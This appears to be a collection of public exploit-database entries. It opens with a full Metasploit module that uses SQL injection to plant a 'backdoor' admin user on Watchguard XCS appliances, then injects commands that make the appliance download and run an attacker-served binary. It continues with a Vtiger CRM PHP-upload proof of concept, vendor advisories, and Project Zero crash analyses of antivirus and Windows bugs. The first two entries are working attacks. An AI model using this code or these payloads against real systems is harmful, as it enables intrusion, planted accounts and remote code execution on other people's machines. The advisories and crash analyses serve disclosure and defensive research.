# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Watchguard XCS Remote Command Execution',
'Description' => %q{
This module exploits two separate vulnerabilities found in the Watchguard XCS virtual
appliance to gain command execution. By exploiting an unauthenticated SQL injection, a
remote attacker may insert a valid web user into the appliance database, and get access
to the web interface. On the other hand, a vulnerability in the web interface allows the
attacker to inject operating system commands as the 'nobody' user.
},
'Author' =>
[
'Daniel Jensen <daniel.jensen[at]security-assessment.com>' # discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
],
'Platform' => 'bsd',
'Arch' => ARCH_X86_64,
'Privileged' => false,
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
[ 'Watchguard XCS 9.2/10.0', { }]
],
'DefaultOptions' =>
{
'SSL' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 29 2015'
))
register_options(
[
OptString.new('TARGETURI', [true, 'The target URI', '/']),
OptString.new('WATCHGUARD_USER', [true, 'Web interface user account to add', 'backdoor']),
OptString.new('WATCHGUARD_PASSWORD', [true, 'Web interface user password', 'backdoor']),
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
Opt::RPORT(443)
],
self.class
)
end
def check
#Check to see if the SQLi is present
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'),
'cookie' => "sid=1'"
})
if res && res.body && res.body.include?('unterminated quoted string')
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
# Get a valid session by logging in or exploiting SQLi to add user
print_status('Getting a valid session...')
@sid = get_session
print_status('Successfully logged in')
# Check if cmd injection works
test_cmd_inj = send_cmd_exec('/ADMIN/mailqueue.spl', 'id')
unless test_cmd_inj && test_cmd_inj.body.include?('uid=65534')
fail_with(Failure::UnexpectedReply, 'Could not inject command, may not be vulnerable')
end
# We have cmd exec, stand up an HTTP server and deliver the payload
vprint_status('Getting ready to drop binary on appliance')
@elf_sent = false
# Generate payload
@pl = generate_payload_exe
if @pl.nil?
fail_with(Failure::BadConfig, 'Please select a native bsd payload')
end
# Start the server and use primer to trigger fetching and running of the payload
begin
Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error
end
end
def attempt_login(username, pwd_clear)
#Attempts to login with the provided user credentials
#Get the login page
get_login_hash = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/login.spl')
})
unless get_login_hash && get_login_hash.body
fail_with(Failure::Unreachable, 'Could not get login page.')
end
#Find the hash token needed to login
login_hash = ''
get_login_hash.body.each_line do |line|
next if line !~ /name="hash" value="(.*)"/
login_hash = $1
break
end
sid_cookie = (get_login_hash.get_cookies || '').scan(/sid=(\w+);/).flatten[0] || ''
if login_hash == '' || sid_cookie == ''
fail_with(Failure::UnexpectedReply, 'Could not find login hash or cookie')
end
login_post = {
'u' => "#{username}",
'pwd' => "#{pwd_clear}",
'hash' => login_hash,
'login' => 'Login'
}
print_status('Attempting to login with provided credentials')
login = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/login.spl'),
'method' => 'POST',
'encode_params' => false,
'cookie' => "sid=#{sid_cookie}",
'vars_post' => login_post,
'vars_get' => {
'f' => 'V'
}
})
unless login && login.body && login.body.include?('<title>Loading...</title>')
return nil
end
sid_cookie
end
def add_user(user_id, username, pwd_hash, pwd_clear)
#Adds a user to the database using the unauthed SQLi
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'),
'cookie' => "sid=1%3BINSERT INTO sds_users (self, login, password, org, priv_level, quota, disk_usage) VALUES(#{user_id}, '#{username}', '#{pwd_hash}', 0, 'server_admin', 0, 0)--"
})
unless res && res.body
fail_with(Failure::Unreachable, "Could not connect to host")
end
if res.body.include?('ERROR: duplicate key value violates unique constraint')
print_status("Added backdoor user, credentials => #{username}:#{pwd_clear}")
else
fail_with(Failure::UnexpectedReply, 'Unable to add user to database')
end
true
end
def generate_device_hash(cleartext_password)
#Generates the specific hashes needed for the XCS
pre_salt = 'BorderWare '
post_salt = ' some other random (9) stuff'
hash_tmp = Rex::Text.md5(pre_salt + cleartext_password + post_salt)
final_hash = Rex::Text.md5(cleartext_password + hash_tmp)
final_hash
end
def send_cmd_exec(uri, os_cmd, blocking = true)
#This is a handler function that makes HTTP calls to exploit the command injection issue
unless @sid
fail_with(Failure::Unknown, 'Missing a session cookie when attempting to execute command.')
end
opts = {
'uri' => normalize_uri(target_uri.path, "#{uri}"),
'cookie' => "sid=#{@sid}",
'encode_params' => true,
'vars_get' => {
'f' => 'dnld',
'id' => ";#{os_cmd}"
}
}
if blocking
res = send_request_cgi(opts)
else
res = send_request_cgi(opts, 1)
end
#Handle cmd exec failures
if res.nil? && blocking
fail_with(Failure::Unknown, 'Failed to exploit command injection.')
end
res
end
def get_session
#Gets a valid login session, either valid creds or the SQLi vulnerability
username = datastore['WATCHGUARD_USER']
pwd_clear = datastore['WATCHGUARD_PASSWORD']
user_id = rand(999)
sid_cookie = attempt_login(username, pwd_clear)
return sid_cookie unless sid_cookie.nil?
vprint_error('Failed to login, attempting to add backdoor user...')
pwd_hash = generate_device_hash(pwd_clear)
unless add_user(user_id, username, pwd_hash, pwd_clear)
fail_with(Failure::Unknown, 'Failed to add user account to database.')
end
sid_cookie = attempt_login(username, pwd_clear)
unless sid_cookie
fail_with(Failure::Unknown, 'Unable to login with user account.')
end
sid_cookie
end
# Make the server download the payload and run it
def primer
vprint_status('Primer hook called, make the server get and run exploit')
#Gets the autogenerated uri from the mixin
payload_uri = get_uri
filename = rand_text_alpha_lower(8)
print_status("Sending download request for #{payload_uri}")
download_cmd = "/usr/local/sbin/curl -k #{payload_uri} -o /tmp/#{filename}"
vprint_status("Telling appliance to run #{download_cmd}")
send_cmd_exec('/ADMIN/mailqueue.spl', download_cmd)
register_file_for_cleanup("/tmp/#{filename}")
chmod_cmd = "chmod +x /tmp/#{filename}"
vprint_status('Chmoding the payload...')
send_cmd_exec("/ADMIN/mailqueue.spl", chmod_cmd)
exec_cmd = "/tmp/#{filename}"
vprint_status('Running the payload...')
send_cmd_exec('/ADMIN/mailqueue.spl', exec_cmd, false)
vprint_status('Finished primer hook, raising Timeout::Error manually')
raise(Timeout::Error)
end
#Handle incoming requests from the server
def on_request_uri(cli, request)
vprint_status("on_request_uri called: #{request.inspect}")
print_status('Sending the payload to the server...')
@elf_sent = true
send_response(cli, @pl)
end
end
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
# Exploit Title: Vtiger CRM <= 6.3.0 Authenticated Remote Code Execution
# Date: 2015-09-28
# Exploit Author: Benjamin Daniel Mussler
# Vendor Homepage: https://www.vtiger.com
# Software Link: https://www.vtiger.com/open-source-downloads/
# Version: 6.3.0 (and lower)
# Tested on: Linux (Ubuntu)
# CVE : CVE-2015-6000
# Source: http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html
=== Description ===
Vtiger CRM's administration interface allows for the upload of a company
logo. Instead of uploading an image, an attacker may choose to upload a
file containing PHP code and run this code by accessing the resulting
PHP file.
Detailed description:
http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html
=== PoC ===
Through a specially crafted HTTP-POST request, a PHP file is stored on
the server hosting the Vtiger CRM software:
POST /index.php HTTP/1.1
Host: [...]
Cookie: [...]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------51732462825208
Content-Length: 2040
-----------------------------51732462825208
Content-Disposition: form-data; name="__vtrftk"
[...]
-----------------------------51732462825208
Content-Disposition: form-data; name="logo"; filename="2.php"
Content-Type: image/jpeg
<? system('id; uname -a; /sbin/ifconfig -a'); system('cat ../../vtigerversion.php'); ?>
-----------------------------51732462825208
Content-Disposition: form-data; name="address"
[...]
The resulting PHP file can then be accessed at
[Vtiger URL]/test/logo/2.php
- --
Benjamin Daniel MUSSLER
Ix-Xgħajra, Malta Tel (MT) +356 9965 3798
Karlsruhe, Germany Tel (DE) +49 721 989 0150
Web: https://FL7.DE PGP: https://FL7.DE/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.21 (MingW32)
iQIcBAEBAgAGBQJWCVaeAAoJEAg0a3ng3v4f108P/0u+CUuUKSsSFiQt4S/HVAnw
5ykzNoZ/T1v0LUrItI1bZPeTyRr6VUandYclg68OM3VY0zc4x9161ScSlcnIitVO
AasvEw7mGguAR4Pe2i84LpPNvE6Bi+MJqU6vnBqZVmQMXUY8k+Mb0ufM/DMByLPj
dcozrAgI9ZQC3pnWiOPigD+gHe/AxY3Z1cxQLluOqBmMf7f3JXC+1dZt91EScuyi
lHNtd6/uRtHJKqBG8MZMXnq49OxTk7iiqQmb393RizPL0eI8FumwaCXTDnLgRwX3
7XQfmg3sCzT1jPSQB4/UYciePPOS4EREjDA/RW5ydtGRCkZPvmjUlfaFMwTjlCd1
dpRIRlzDBWUCVFIqkp2TGkrkbckA1hnehH1q64sQ4KopdKl0tPJ8yLumVr2Uvwtq
iLAbhQcn6+Cr9gctzOlrbj7BqY9uC0HfVdsl1qOCN5v3Yrbq7h/ToPnKGACLQN7t
sALb61+vvriPimTVZD3AQg9t82G1brPHMzp+cLwjhYtw8b+2rohAA0JoUgBsCUHG
8dgnHI1K514soGkCDB4Mk2oM5W8T2tMsxvX/iQDH45IL3hYrROnWUnW+Fd3hA3ks
VsqaNpaDEm+allop6OH3PETs6rGsLyaspCJBdkqKqxNOS6XE+lScrBVxzNL4VJL2
i8fbvZ/RIkuBT0Z79hUV
=gMXq
-----END PGP SIGNATURE-----
# Title: Adobe Acrobat Reader AFParseDate Javascript API Restrictions
Bypass Vulnerability
# Date: 09/28/2015
# Author: Reigning Shells, based off PoC published by Zero Day Initiative
# Vendor Homepage: adobe.com
# Version: Adobe Reader and Acrobat 10.x before 10.1.14 and 11.x before
11.0.11 on Windows and OS X are vulnerable.
# Tested on: Adobe Acrobat 11.0.10 on Windows 7
# CVE : CVE-2015-3073
This vulnerability allows remote attackers to bypass API restrictions on
vulnerable installations of Adobe Reader. User interaction is required to
exploit this vulnerability in that the target must visit a malicious page
or open a malicious file.
The specific flaw exists within AFParseDate. By creating a specially
crafted PDF with specific JavaScript instructions, it is possible to bypass
the Javascript API restrictions. A remote attacker could exploit this
vulnerability to execute arbitrary code.
Adobe Reader and Acrobat 10.x before 10.1.14 and 11.x before 11.0.11 on
Windows and OS X are vulnerable.
Notes:
The code assumes you attached a DLL named exploit.txt to the PDF document
to get around attachment security restrictions.
Acrobat will execute updaternotifications.dll if it's in the same directory
as the Acrobat executable or the same directory as the document being
opened.
Credit for discovery and the initial POC that illustrates code being
executed in the privileged context (launching a URL) goes to the Zero Day
Initiative.
Code:
https://github.com/reigningshells/CVE-2015-3073/blob/master/exploit.js
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38344.zip
Document Title:
===============
Photos in Wifi v1.0.1 iOS - Arbitrary File Upload Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1600
Release Date:
=============
2015-09-28
Vulnerability Laboratory ID (VL-ID):
====================================
1600
Common Vulnerability Scoring System:
====================================
8.6
Product & Service Introduction:
===============================
Share the photos and videos of your iPhone/iPad in wifi. Upload photos and videos right to your camera roll without iTunes.
With Photos In Wifi, you can share your whole camera roll, and album, or a selection of photos and videos. Once the app
server is started, you can view, play and download the shared photos and videos from any computer or smartphone web browser.
You can also upload a photo, a video, or a zip file containing 100`s of photos and videos, right into your iPhone/iPad
camera roll. You can also use Photos In Wifi to send multiples full resolution photos and videos in a single email or MMS.
(Copy of the Homepage: https://itunes.apple.com/us/app/photos-in-wifi-share-photos/id966316576 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered an arbitrary file upload web vulnerability in the Photos in Wifi v1.0.1 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-09-28: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Sebastien BUET
Product: Photos In Wifi - iOS Mobile (Web-Application) 1.0.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
An arbitrary file upload web vulnerability has been discovered in the official Photos in Wifi v1.0.1 iOS mobile web-application.
The vulnerability allows remote attackers to upload an arbitrary (malicious) file to compromise the iOS wifi web-application.
The arbitrary file upload vulnerability is located in `Select a photo or a video to upload` module. Remote attackers are able to intercept
the vulnerable `filename` value in the `upload > submit` POST method request to compromise the mobile device or interface app. The attacker
can use a live session tamper for http to change the `filename` value to a webshell. After the upload the attacker requests the
`asset.php` file to execute the stored malicious file. The encoding of the `ext` value and the parse of the `filename` value is broken
which results obviously in this type behavior. The injection point of the issue is the upload POST method request with the vulnerable
filename value. The execution point occurs in the `assets.php` file when processing to display the images or videos. The upload file path
execution is not restricted (flag) and helps an attacker in case of exploitation to easily upload or access webshells.
Exploitation of the remote web vulnerability requires no user interaction and also no privileged web application user account.
Successful exploitation of the arbitrary file upload vulnerability results in web-server, web module, website or dbms compromise.
Vulnerable Module(s):
[+] ./assets-library://asset/
Vulnerable File(s):
[+] asset.php
Proof of Concept (PoC):
=======================
The arbitrary file upload vulnerability can be exploited by remote attackers without privilege web-application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Start the web-server (wifi)
2. Go to another computer and login by requesting via http localhost
3. Click upload and choose a random file
4. Start a live session tamper for http
5. Submit the upload to continue with the POST method request
6. Inject to the filename value a webshell code
7. Continue to reply the request
8. The server responds with 200OK
9. Open the poc url of the path to execute the webshell to compromise the mobile device or mobile app
10. Successful reproduce of the arbitrary file upload vulnerability!
PoC: URL
http://localhost/assets-library://asset/asset.php?id=40C9C332-857B-4CB8-B848-59A30AA9CF3B&ext=php
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost/
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[466583] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost/]
Connection[keep-alive]
Cache-Control[max-age=0]
POST-Daten:
POST_DATA[-----------------------------191201034430987
Content-Disposition: form-data; name="file"; filename="./[ARBITRARY FILE UPLOAD VULNERABILITY!]2.[ext]"
Content-Type: html
Status: 200[OK]
GET http://localhost/assets-library://asset/asset.php?id=250D47DB-57DD-47E4-B72A-CD4455B06277&ext=php
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Date[Sa., 12 Sep. 2015 11:23:51 GMT]
Security Risk:
==============
The security risk of the arbitrary file upload web vulnerability in the wifi interface upload post method request is estimated as high. (CVSS 8.6)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Source: https://code.google.com/p/google-security-research/issues/detail?id=524
Fuzzing CHM files with Kaspersky Antivirus produced the attached crash.
(83c.fec): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0bd3e470 ebx=00000ef1 ecx=00000000 edx=0b002fb0 esi=00000018 edi=0bd3e473
eip=15edb522 esp=0bd3e234 ebp=0bd3e240 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
15edb522 8a12 mov dl,byte ptr [edx] ds:002b:0b002fb0=??
Where does edx come from?
0:085> uf 15edb4f0
15edb4f0 55 push ebp
...
15edb520 8b10 mov edx,dword ptr [eax]
15edb522 8a12 mov dl,byte ptr [edx]
15edb524 8817 mov byte ptr [edi],dl
15edb526 ff00 inc dword ptr [eax]
15edb528 47 inc edi
15edb529 83c6ff add esi,0FFFFFFFFh
15edb52c 83d1ff adc ecx,0FFFFFFFFh
15edb52f 8bd6 mov edx,esi
15edb531 0bd1 or edx,ecx
15edb533 75eb jne 15edb520
...
Edx is a parameter, and this is a simple memcpy loop.
for (i = ArgSize; i > 0; i--) {
*argDestPtr++ = *argSrcPtr++;
}
But why is the input pointer corrupt, that should be a pointer to the input buffer (i.e. the CHM being scanned)?
0:018> kvn1
# ChildEBP RetAddr Args to Child
00 03f4e1c0 15edb73b 0000022f 00000000 0afda8d4 0x15edb522
0:018> ub 15edb73b
15edb725 3bc1 cmp eax,ecx
15edb727 774f ja 15edb778
15edb729 52 push edx
15edb72a 50 push eax
15edb72b 8d95e8fdffff lea edx,[ebp-218h] <-- destination buffer
15edb731 8bcb mov ecx,ebx
15edb733 8d45fc lea eax,[ebp-4]
15edb736 e8b5fdffff call 15edb4f0
Ah, the destination is a fixed size stack buffer (I'm guessing 512 bytes), so if the size read from the input is greater than 512 (in this case it's 0x22f), the stack will be corrupted.
The input pointer is corrupt because the loop overwrites the src pointer with attacker controlled input and then it crashes trying to read from it. That can obviously be fixed by an attacker, so this is an exploitable stack buffer overflow.
It seems likely /GS would have made this unexploitable.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38285.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=457
---
The attached testcase crashes Win 7 with Special Pool enabled while accessing the freed global cursor object (_gpqCursor). See poc.cpp for instructions on how to compile and run.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38278.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=433
---
The attached PoC demonstrates a UAF condition with printer device contexts. The PoC will trigger on Win 7 32-bit with Special Pool enabled.
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38279.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=415
---
Tested on Win 7 32-bit with Special Pool enabled.
Multiple pool buffer overflows can be triggered through the NtGdiStretchBlt system call. The attached PoC demonstrates a write overflow and another read over flow issue which is likely to be usable for memory leaks (enabled by uncommenting the first NtGdiStretchBlt call).
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38280.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=522
Fuzzing VB6 executables produced the attached crash testcase:
(5a8.dc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=ffffffff ebx=0a07e8ec ecx=0a07eb04 edx=00000000 esi=0907e924 edi=00000010
eip=13d64b78 esp=0ea6ee30 ebp=0ea6ee38 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
13d64b78 0fb60e movzx ecx,byte ptr [esi] ds:002b:0907e924=??
# where does esi come from?
0:121> ub @eip La
13d64b60 55 push ebp
13d64b61 8bec mov ebp,esp
13d64b63 8b4514 mov eax,dword ptr [ebp+14h]
13d64b66 57 push edi
13d64b67 8b7d0c mov edi,dword ptr [ebp+0Ch]
13d64b6a f7d0 not eax
13d64b6c 85ff test edi,edi
13d64b6e 0f849e000000 je 13d64c12
13d64b74 56 push esi
13d64b75 8b7510 mov esi,dword ptr [ebp+10h]
# Okay, it's a parameter
0:121> kvn1
# ChildEBP RetAddr Args to Child
00 0ea6ee38 14424d8f 1656cae4 00000010 0907e924 0x13d64b78
0:121> ub 14424d8f La
14424d77 8b4304 mov eax,dword ptr [ebx+4] <-- load index
14424d7a 03c3 add eax,ebx <-- add to pointer
14424d7c 8d4c3bf0 lea ecx,[ebx+edi-10h] <-- probably load bounds of buffer
14424d80 3bc1 cmp eax,ecx <-- check if index is in bounds
14424d82 771f ja 14424da3 <-- too late, overflow has already happened
14424d84 6a00 push 0
14424d86 50 push eax < +0x10
14424d87 6a10 push 10h
14424d89 56 push esi
14424d8a e8d1fd93ff call 13d64b60
Looks like the code is doing
ptr += offset;
if (ptr > ptr+SizeOfBuffer)
goto error;
This is obviously incorrect, because the offset can wrap. Where does that value come from?
0:121> dd ebx
0a07e8ec 00000228 ff000038 000000d0 000000f8
0a07e8fc 0000014f 00000120 00000158 000001bc
0a07e90c 00000048 00000000 00000204 00000211
0a07e91c 38000208 00000000 02a69b00 101b081b
0a07e92c 00083389 5a4f2f2b 02a69b02 101b081b
0a07e93c 00083389 5a4f2f2b 09194000 11cfdf6e
0a07e94c a000748e f8260fc9 bac300ac 4551fc30
0a07e95c 204f1db8 383f2a55 77696e7e 4df2a25e
That is from the input file:
*0001e10: 2802 0000 3800 00ff d000 0000 f800 0000 (...8...........
0001e20: 4f01 0000 2001 0000 5801 0000 bc01 0000 O... ...X.......
0001e30: 4800 0000 0000 0000 0402 0000 1102 0000 H...............
0001e40: 0802 0038 0000 0000 009b a602 1b08 1b10 ...8............
0001e50: 8933 0800 2b2f 4f5a 029b a602 1b08 1b10 .3..+/OZ........
0001e60: 8933 0800 2b2f 4f5a 0040 1909 6edf cf11 .3..+/OZ.@..n...
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38281.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=525
Fuzzing packed executables found the attached crash, it might be usable as an information leak as part of another bug, so filing as a low-risk bug. If I had to guess, I would say this is the ExeCryptor unpacker.
(83c.fc0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0b61f00c ebx=00030ff4 ecx=00000000 edx=00000000 esi=0409005c edi=00000000
eip=15cc7e73 esp=0441ecf8 ebp=0441ef18 iopl=0 nv up ei pl nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010217
15cc7e73 803c03e9 cmp byte ptr [ebx+eax],0E9h ds:002b:0b650000=??
What is that code doing?
0:021> u
15cc7e73 803c03e9 cmp byte ptr [ebx+eax],0E9h
15cc7e77 0f8596000000 jne 15cc7f13
15cc7e7d 8b540301 mov edx,dword ptr [ebx+eax+1]
15cc7e81 8d441a05 lea eax,[edx+ebx+5]
15cc7e85 33c9 xor ecx,ecx
15cc7e87 3d00100000 cmp eax,1000h
15cc7e8c 0f9cc1 setl cl
15cc7e8f 33d2 xor edx,edx
That edx+ebx+5 gives it away, it's searching for a jmp opcode and trying to pull out the branch target.
Why did it get lost? I'll put a breakpoint there and see where it goes wrong:
0:021> bp @eip
0:021> .restart
Breakpoint 0 hit
eax=0584f00c ebx=00000000 ecx=0497eb4c edx=00000000 esi=05a1005c edi=00000000
eip=15cc7e73 esp=0497ebc4 ebp=0497ede4 iopl=0 nv up ei ng nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000282
15cc7e73 803c03e9 cmp byte ptr [ebx+eax],0E9h ds:002b:0584f00c=00
That looks fine, eax is the start of the buffer to search, and ebx is the index to look for a jmp opcode.
0:024> t
eax=0584f00c ebx=00000000 ecx=0497eb4c edx=00000000 esi=05a1005c edi=00000000
eip=15cc7e77 esp=0497ebc4 ebp=0497ede4 iopl=0 nv up ei pl nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000217
15cc7e77 0f8596000000 jne 15cc7f13 [br=1]
0:024> t
eax=0584f00c ebx=00000000 ecx=0497eb4c edx=00000000 esi=05a1005c edi=00000000
eip=15cc7f13 esp=0497ebc4 ebp=0497ede4 iopl=0 nv up ei pl nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000217
15cc7f13 43 inc ebx
0:024> t
eax=0584f00c ebx=00000001 ecx=0497eb4c edx=00000000 esi=05a1005c edi=00000000
eip=15cc7f14 esp=0497ebc4 ebp=0497ede4 iopl=0 nv up ei pl nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000203
15cc7f14 8d47fb lea eax,[edi-5]
0:024> t
eax=fffffffb ebx=00000001 ecx=0497eb4c edx=00000000 esi=05a1005c edi=00000000
eip=15cc7f17 esp=0497ebc4 ebp=0497ede4 iopl=0 nv up ei pl nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000203
15cc7f17 3bd8 cmp ebx,eax
Ah, that's the bug, it's wrapping past zero and never exiting. The code is probably doing:
do {
if (ptr[index] != JMP_OPCODE)
index -= SIZEOF_JMP;
} while (index != 0);
That's a bug, because if index < SIZEOF_JMP, it will wrap and never exit. I would think it should decrement by 1 not sizeof(jmp) anyway, because jmps do not have to be aligned, but I don't know anything about ExeCryptor - maybe it makes sense.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38282.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=526
Fuzzing of packed executables found the attached crash.
0:022> g
(83c.bbc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000005 ebx=04320481 ecx=7ffffffd edx=f50139ce esi=80000027 edi=0432005c
eip=15de0bd2 esp=0bb4ee04 ebp=0bb4ee20 iopl=0 ov up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010a06
15de0bd2 8a843700040000 mov al,byte ptr [edi+esi+400h] ds:002b:84320483=??
If I step through that address calculation:
0:022> p
eax=00000005 ebx=04320481 ecx=7ffffffd edx=f50139ce esi=80000022 edi=0432005c
eip=15de0d3a esp=0bb4ee04 ebp=0bb4ee20 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
15de0d3a 03f0 add esi,eax
0:022> p
eax=00000005 ebx=04320481 ecx=7ffffffd edx=f50139ce esi=80000027 edi=0432005c
eip=15de0d3c esp=0bb4ee04 ebp=0bb4ee20 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
15de0d3c 3b75f0 cmp esi,dword ptr [ebp-10h] ss:002b:0bb4ee10=000003f1
0:022> p
eax=00000005 ebx=04320481 ecx=7ffffffd edx=f50139ce esi=80000027 edi=0432005c
eip=15de0d3f esp=0bb4ee04 ebp=0bb4ee20 iopl=0 ov up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000a06
15de0d3f 0f8c8dfeffff jl 15de0bd2 [br=1]
0:022> p
eax=00000005 ebx=04320481 ecx=7ffffffd edx=f50139ce esi=80000027 edi=0432005c
eip=15de0bd2 esp=0bb4ee04 ebp=0bb4ee20 iopl=0 ov up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000a06
15de0bd2 8a843700040000 mov al,byte ptr [edi+esi+400h] ds:002b:84320483=??
This looks like an integer overflow:
int base;
int index;
if (base + index > argMaxSize)
goto error;
Because it's a signed comparison, 7ffffffd + 5 is
0:022> ? ecx + eax
Evaluate expression: -2147483646
